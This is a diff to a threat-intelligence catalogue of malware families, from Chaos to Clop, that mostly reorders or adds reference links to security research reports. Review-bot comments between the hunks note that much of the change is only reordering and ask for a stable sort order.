@@ -16320,15 +17384,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos",
+ "https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html",
"https://www.bleepingcomputer.com/news/security/roblox-game-pass-store-used-to-sell-ransomware-decryptor/",
- "https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/",
- "https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging",
"https://brianstadnicki.github.io/posts/malware-chaos-ransomware-v4/",
- "https://twitter.com/vinopaljiri/status/1519645742440329216",
- "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia",
+ "https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree",
"https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-in-fake-minecraft-alt-list-brings-destruction",
- "https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html"
+ "https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html",
+ "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia",
+ "https://twitter.com/vinopaljiri/status/1519645742440329216",
+ "https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/"
],
"synonyms": [
"FakeRyuk",
@@ -16338,7 +17403,7 @@
"type": []
},
"uuid": "fb760029-9331-4ba0-b644-d47a8e6d3ad2",
- "value": "Chaos"
+ "value": "Chaos (Windows)"
},
{
"description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.",
@@ -16376,11 +17441,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chches",
"http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/",
- "https://www.jpcert.or.jp/magazine/acreport-ChChes.html",
"https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html",
+ "https://www.jpcert.or.jp/magazine/acreport-ChChes.html",
"https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html"
],
"synonyms": [
"HAYMAKER",
@@ -16396,8 +17461,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045c",
"https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045c",
"https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf"
],
"synonyms": [
@@ -16426,8 +17491,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/"
+ "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html"
],
"synonyms": [
"cherry_picker",
@@ -16457,78 +17523,79 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper",
- "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
- "https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/",
- "https://attack.mitre.org/groups/G0125/",
- "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
- "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
- "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/",
- "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
- "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/",
- "https://twitter.com/ESETresearch/status/1366862946488451088",
- "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf",
- "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/",
- "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Backdoor%2Bvia%2BXFF%2BMysterious%2BThreat%2BActor%2BUnder%2BRadar.pdf",
- "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
- "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
- "https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html",
- "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
- "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html",
- "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
- "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
- "https://blog.joshlemon.com.au/hafnium-exchange-attacks/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a",
- "https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks",
- "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
- "https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/",
- "https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders",
- "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
- "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
- "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
- "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
- "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers",
- "https://www.secureworks.com/research/threat-profiles/bronze-president",
- "https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion",
- "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-259a",
- "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
- "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://www.secureworks.com/research/threat-profiles/bronze-express",
- "https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968",
- "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
- "https://redcanary.com/blog/microsoft-exchange-attacks",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
- "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
- "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/",
- "https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/",
- "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
- "https://www.youtube.com/watch?v=rn-6t7OygGk",
- "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
- "https://attack.mitre.org/software/S0020/",
- "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/",
- "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/",
- "https://unit42.paloaltonetworks.com/china-chopper-webshell/",
"https://attack.mitre.org/groups/G0096",
- "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html",
+ "https://redcanary.com/blog/microsoft-exchange-attacks",
+ "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits",
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers",
- "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://www.youtube.com/watch?v=rn-6t7OygGk",
+ "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
+ "https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968",
+ "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-259a",
+ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
+ "https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/",
"https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
- "https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4"
+ "https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/",
+ "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers",
+ "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
+ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
+ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Backdoor%2Bvia%2BXFF%2BMysterious%2BThreat%2BActor%2BUnder%2BRadar.pdf",
+ "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf",
+ "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html",
+ "https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
+ "https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html",
+ "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
+ "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
+ "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
+ "https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4",
+ "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
+ "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
+ "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/",
+ "https://blog.joshlemon.com.au/hafnium-exchange-attacks/",
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "https://attack.mitre.org/groups/G0125/",
+ "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
+ "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html",
+ "https://attack.mitre.org/software/S0020/",
+ "https://unit42.paloaltonetworks.com/china-chopper-webshell/",
+ "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html",
+ "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
+ "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/",
+ "https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/",
+ "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
+ "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://twitter.com/ESETresearch/status/1366862946488451088",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders",
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers",
+ "https://www.secureworks.com/research/threat-profiles/bronze-president",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/",
+ "https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/",
+ "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf",
+ "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
],
"synonyms": [],
"type": []
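Review bot: The Huntress webinar URL (`.../Overlay-Mass_Exploitation_of_Exchange.mp4`) is removed on the `-` line and re-added unchanged further down in the same `refs` list, so that pair is a move, not a change; the hunk's only real effect is appending new references. Since the refs array is emitted with a shifting order, please have the generator sort it (or preserve the existing order) so the diff shows net additions only; the same churn makes every refs hunk in this patch harder to review than it needs to be.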
@@ -16566,7 +17633,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chinotto",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/"
+ "https://thorcert.notion.site/TTPs-9-f04ce99784874947978bd2947738ac92",
+ "https://blog.sekoia.io/peeking-at-reaper-surveillance-operations-against-north-korea-defectors/",
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
+ "https://threatmon.io/chinotto-backdoor-technical-analysis-of-the-apt-reapers-powerful/",
+ "https://www.boho.or.kr/data/reportView.do?bulletin_writing_sequence=67064"
],
"synonyms": [],
"type": []
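Review bot: The securelist.com entry is dropped and re-inserted in a different position, so this hunk's net change is four new references, not a replacement; a stable refs order would make that visible at a glance. One of the additions, the `thorcert.notion.site` link, points at a user-hosted Notion page, which is easy to lose; consider pairing it with an archived capture the way the cisoclub.ru report elsewhere in this patch carries a web.archive.org copy.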
@@ -16580,16 +17651,16 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy",
"https://documents.trendmicro.com/assets/white_papers/wp-finding-APTX-attributing-attacks-via-MITRE-TTPs.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf",
- "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
"https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf",
"https://community.riskiq.com/article/5fe2da7f",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
+ "https://nao-sec.org/2021/01/royal-road-redive.html",
"https://community.riskiq.com/article/56fa1b2f",
"https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists",
- "https://nao-sec.org/2021/01/royal-road-redive.html",
- "https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ffd98ca2a02",
- "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ffd98ca2a02"
],
"synonyms": [],
"type": []
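Review bot: This hunk is a no-op: every URL on a `-` line reappears unchanged on a `+` line (go.recordedfuture.com, the two medium.com/@Sebdraven posts, pwc.co.uk, nao-sec.org, bitdefender.com) and no reference is added or removed, only the list order changes. The Chisel, Chthonic, Cinobi, Citadel and ClipBanker hunks below are the same kind of pure reorder. With a deterministic refs order these hunks would disappear from the patch entirely, which is worth doing before merge since they bloat the change and hide the entries that actually matter.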
@@ -16614,8 +17685,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chisel",
- "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
- "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/"
+ "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/",
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/"
],
"synonyms": [],
"type": []
@@ -16643,7 +17714,8 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.choziosi",
"https://cybergeeks.tech/chromeloader-browser-hijacker",
"https://redcanary.com/blog/chromeloader/",
- "https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html"
+ "https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html",
+ "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension"
],
"synonyms": [
"ChromeLoader"
@@ -16658,10 +17730,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
"https://securelist.com/chthonic-a-new-modification-of-zeus/68176/",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html"
],
"synonyms": [
"AndroKINS"
@@ -16689,10 +17761,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi",
- "http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html",
- "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf",
"https://www.trendmicro.com/en_us/research/21/h/cinobi-banking-trojan-targets-users-of-cryptocurrency-exchanges-.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/",
+ "http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html",
+ "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf"
],
"synonyms": [],
"type": []
@@ -16705,12 +17777,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel",
- "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/",
"https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
- "http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
"http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html",
+ "http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
+ "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
"https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals"
+ "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/"
],
"synonyms": [],
"type": []
@@ -16777,11 +17849,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
"https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/",
"https://asec.ahnlab.com/en/35981/",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/covid-19-phishing-lure-to-steal-and-mine-cryptocurrency/"
],
"synonyms": [],
@@ -16795,136 +17867,158 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.clop",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/",
- "https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks",
- "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/",
- "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/",
- "https://twitter.com/darb0ng/status/1338692764121251840",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-clop",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/",
- "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/",
- "https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
- "https://unit42.paloaltonetworks.com/clop-ransomware/",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
